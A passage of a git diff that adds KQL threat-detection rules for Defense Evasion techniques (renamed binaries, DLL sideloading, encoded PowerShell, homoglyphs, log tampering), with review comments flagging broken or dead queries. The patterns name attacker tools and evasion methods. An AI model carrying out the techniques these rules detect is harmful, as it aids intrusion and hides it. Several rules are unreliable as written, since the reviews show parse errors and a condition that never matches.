ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains 
"👩🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏾" or 
ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏾" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql new file mode 100644 index 00000000..969840b0 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql 
@@ -0,0 +1,12 @@
+// Title: Potential Defense Evasion Via Binary Rename
+// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-06-15
+// Level: medium
+// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "7za.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7za.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
new file mode 100644
index 00000000..6f6fd84c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
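Review bot: The Description line still says the rule leverages the "new Sysmon OriginalFileName datapoint", but the query reads `ProcessVersionInfoOriginalFileName` from `DeviceProcessEvents`, so the header documents a data source the converted rule does not use. The same wording is carried into the next hunk (potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql). A wording that matches the query would be `// Description: Detects the execution of a renamed binary often used by attackers or malware, using the ProcessVersionInfoOriginalFileName field of DeviceProcessEvents.` If the converter copies Sigma descriptions verbatim this is presumably a converter-level limitation rather than something to hand-edit per rule.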
@@ -0,0 +1,13 @@
+// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries
+// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
+// Date: 2019-06-15
+// Level: high
+// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009
+// False Positives:
+// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
+// - PsExec installed via Windows Store doesn't contain original filename field (False negative)
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "IE4UINIT.EXE", "mshta.exe", "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ie4uinit.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath 
endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql
new file mode 100644
index 00000000..094b8395
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql
@@ -0,0 +1,14 @@
+// Title: Potential Defense Evasion Via Right-to-Left Override
+// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
+This is used as an obfuscation and masquerading techniques.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.002
+// False Positives:
+// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\u202e" or ProcessCommandLine contains "[U+202E]"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql
new file mode 100644
index 00000000..aa3c0853
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql
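Review bot: The second description line `+This is used as an obfuscation and masquerading techniques.` carries no `//` prefix, so it lands in the .kql file as bare text ahead of `DeviceProcessEvents` and the query will most likely fail to parse in Advanced Hunting; every continuation line of a multi-line Sigma description needs the prefix (`// This is used as an obfuscation and masquerading techniques.`). The same unprefixed continuation lines appear in potential_fake_instance_of_hxtsr_exe_executed.kql, potential_file_download_via_ms_appinstaller_protocol_handler.kql and both potential_homoglyph_attack_using_lookalike_characters rules, which suggests the converter's header writer only prefixes the first line of the description. Separately, `contains "\\u202e"` compares against the literal six characters `\u202e` — the double backslash is an escaped backslash, exactly as in every `"\\cmd.exe"` pattern in this patch — not against the U+202E code point, so if the intent is to catch the real override character the literal must contain that character itself; the description's "u202+E" also looks like a typo for U+202E.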
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DBGCORE.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects DLL sideloading of "dbgcore.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbgcore.dll") or FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql
new file mode 100644
index 00000000..6f57d451
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DBGHELP.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potential DLL sideloading of "dbghelp.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll") or (FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
new file mode 100644
index 00000000..24a6fe3e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql
new file mode 100644
index 00000000..075a86e3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Via ClassicExplorer32.dll
+// Author: frack113
+// Date: 2022-12-13
+// Level: medium
+// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql
new file mode 100644
index 00000000..fa0f3ac5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Via comctl32.dll
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql
new file mode 100644
index 00000000..29802420
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Via JsSchHlp
+// Author: frack113
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql
new file mode 100644
index 00000000..da146b02
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Potential Encoded PowerShell Patterns In CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: low
+// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql
new file mode 100644
index 00000000..737412a3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential EventLog File Location Tampering
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: high
+// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
new file mode 100644
index 00000000..96822dbf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
@@ -0,0 +1,13 @@
+// Title: Potential Fake Instance Of Hxtsr.EXE Executed
+// Author: Sreeman
+// Date: 2020-04-17
+// Level: medium
+// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
+HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
+Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
new file mode 100644
index 00000000..54ee0585
--- /dev/null
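Review bot: The two conditions on `RegistryKey` in the `where` clause cannot both be true: a key path cannot end with `\SYSTEM\CurrentControlSet\Services\EventLog*` and also end with `\File`, and KQL `endswith` treats the trailing `*` as a literal asterisk rather than a wildcard, so this rule never matches and is silently dead. In DeviceRegistryEvents the `File` entry is a value name rather than a subkey, so the intended check is probably `| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\" and RegistryValueName =~ "File" and not(RegistryValueData contains "\\System32\\Winevt\\Logs\\")`. A `*` surviving inside an `endswith` literal suggests a wildcard in the source rule is not being translated by the backend, so other converted registry rules in this patch are worth checking for the same pattern.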
+++ b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
@@ -0,0 +1,12 @@
+// Title: Potential File Download Via MS-AppInstaller Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
+The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
new file mode 100644
index 00000000..7d0607bb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
@@ -0,0 +1,13 @@
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
+// Author: Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
new file mode 100644
index 00000000..34c2ae61
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
@@ -0,0 +1,13 @@
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
new file mode 100644
index 00000000..cab5b704
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
@@ -0,0 +1,15 @@ +// Title: Potential Homoglyph Attack Using Lookalike Characters +// Author: Micah Babinski, @micahbabinski +// Date: 2023-05-07 +// Level: medium +// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. +This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 +// False Positives: +// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. + +DeviceProcessEvents +| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" 
or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql new file mode 100644 index 00000000..da8a62c3 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql 
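Review bot: KQL `contains` is case-insensitive, so the second parenthesised group of uppercase homoglyphs is largely redundant with the first wherever a lowercase entry has an uppercase counterpart (the lowercase Cyrillic `"а"` term already matches `"А"`), and the Greek capitals such as `"Α"` will presumably also match their lowercase forms, which are not lookalikes for ASCII letters and so widen the match beyond the "perfect homoglyph" set the description promises. If case-sensitive matching is the intent, `contains_cs` is the operator to use; if not, the duplicated entries can be dropped so the remaining list is readable. The same applies to the FolderPath variant in the next hunk (potential_homoglyph_attack_using_lookalike_characters_in_filename.kql).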
@@ -0,0 +1,15 @@
+// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceFileEvents
+| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath
